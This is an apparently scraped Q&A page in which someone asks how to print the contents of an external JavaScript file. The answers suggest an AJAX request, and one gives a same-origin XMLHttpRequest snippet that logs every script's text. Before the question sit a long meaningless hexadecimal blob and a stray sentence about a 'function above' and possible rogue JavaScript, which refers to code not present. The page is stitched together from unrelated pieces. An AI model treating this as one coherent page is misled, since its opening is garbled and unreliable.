b1be40d8a11266b4387d5c53cf3f59a79114b123ca0c1428a919afa34ad208c5367dd970cf294f3d0b35c368cfc30c848e3cc0613aa3d09a56a8b5528393cac54f17bece159a89d3302ac3a09f0c821e0318a6d18faecd2a4d14c48e1f227d86675995d6c9745dc50cd2a7662b7bb441b05bdfa10d8ec62b5eb089e3b07590b969b77d469e0c5b6841dc669568add86bb1c1aad114de274091492b3f209f8a7164a2718f8807042e76a6744704a428067fb25388e49ccb985a13557453055f23ade04d0b2a4c906158cbc21f89a929e5ba017e6ab4afb25a9cd098ab2b475835424b43817d677d6f21af641805d59f875fc193a6a9740e7059e2ac646e277a2c8f875f697865e0a42c2fb3a2df64915d90794830df5a7d4ab69a18bb3d81ca25da78a01a508f85905dd79e8509c2155b9e44940dc5cb82b7bd6f71682666423fb34ad563e236bb7ba72310b0c767151b3d40b2e4034f3973c8363a23343b4b24afb31e45e3d9712f14445d6111cf06dd6e4d78a23fa91d1d4f73c7568445495ee3585007ac5a9b07d0af61995c8e3270aaa2daa36d7a84291a3b1078ca1e244e6edbb21eac5e39b574c1dee372e1a777519427596a355209146236d07e573372599ad266bd129913d9b1d2d083a62f4c56210c9e3c11be9a8cdf22e02f6ed0dfb483a1a2e2cac68ee20172bd991117c429aa92bf2c663a75995271ba71add46a02df91417ac1b508c58b8279478dc850437e1fa47a60cdb5bf1fbc65d75728a8e25212ad8ed591441ac8140c58c91adec93664802385353540375d5e9e4cc9ce92a6131cb8e07e4e4b31c075c94e1e7d4cc186909757c30a3bc7bf91366e281e45d2d43728b24b2a109a669037031bd2173a5689187d33ddb12cd5c6d484e46250192d38139b757d47707f593c72704c8f791a128061634fa5d32ca8429b2c855b89c495636c11838c0dbb3407c2cadc77b23ab1757c0250886026717b4eb1a0c895d1b993e4673da6694e0c46409d586b9b6abac0ac244da4a8a4c920182755710d7b119c94c3a3a4853664952ce16883654f674abf0ea7032db2892736499226df84787814d0511a2528457669339f24cd1990ae2e7382116b677b4baf0cd121cc34c532918149cdbd7e444a5a71801fc1df47abce1dd1e4521e5e9bb91bb3bc8650debd5a1ad70f94d291c2b1bb2f2e6495874b5f3d779874352d860d75090534c61fb085cc52462ade8b4dd6ce7e5d808361355120a382d43b14295edbdea38835890d8896802faa0a06ba435919b653a972cfd25eb5de104f2e74d6a5e2a97c47351ab9911f1e893a94418f8b78dcb914762da7d55f0478b8e0a8173b9a9a777add547e7c4ce5b707ce62148bc73b0c637a990a0fa831c24ddba659b28996ba92bc66793
Based on the function above, it is clear there is a url intended, but I am not sure if any other rouge JS was run.
This question already has answers here:
Closed 10 years ago.
Possible Duplicate:
How can I get the content of the file specified as the 'src' of a <script> tag?
this may seem like a strange question but it's been on my mind. Say I had a HTML file that references one or many JavaScript files, these files are local but could be external. Now for some reason (my own curiosity) I wish to output the contents of one of these files like a string and write it to the console or even alert the contents. So say I have the following JS file called jsFile.js:
// JavaScript Document
var testString = "I am just an output... or am I",
testNumber = 1,
testArray = [],
testObject = {};
// random functionality, etc... etc...
if(testNumber > 100){
// do something...
}
and I want to output this like so when opening my HTML page:
however I am unsure how to do this, can I find the SCRIPT tag in the dom and use a method on it to output it's contents (see below) or do I have to read the file (somehow) then loop through each line of code collecting it in a variable, then output it by either alert or console.log
<!doctype html>
<html>
<head>
<meta charset="utf-8">
<title>Hello World</title>
</head>
<script type="text/javascript" src="jsFile.js"></script>
<script type="text/javascript">
// find the JS node...
window.onload = function(){
var theFile = document.getElementsByTagName("script")[0];
// none of these will work as the code within the jsFile.js is not a DOM object...
console.log(theFile.text); // returns a zero length string
console.log(theFile.innerHTML); // returns a zero length string
console.log(theFile.textContent); // returns a zero length string
}
</script>
<body>
I am just a HTML file... no more, no less...
</body>
</html>
Above is my first attempt however none of these methods will work as the contents of the script are not DOM objects. I don't need a code specific answer, just a proof of concept, idea or point in the right direction. If I'm not making sense please say so and I will reword my question.
You will need to make an AJAX request to the URL of that script and display the content where ever you want to (just grab the responseText), it is a server side resource, and the returned content will be your javascript :)
While epoch essentially has answered this already, I was triggered by this challenge, I've written a little snippet that dumps all scripting resources to the console, provided that they are upon the same domain (origin). I've tested it in Chrome.
var f = function (src) {
var origin = location.origin || (location.protocol+'//'+location.hostname);
if (src.substr(0, origin.length) != origin) {
return;
}
x = new XMLHttpRequest();
x.open("GET", src.substr(origin.length), true);
x.onreadystatechange = function () {
if (x.readyState == 4 && x.status == 200) {
console.log(x.responseText)
}
};
x.send();
};
var s = document.getElementsByTagName('script');
for (var i = 0; i < s.length; ++i) {
f(s[i].src);
}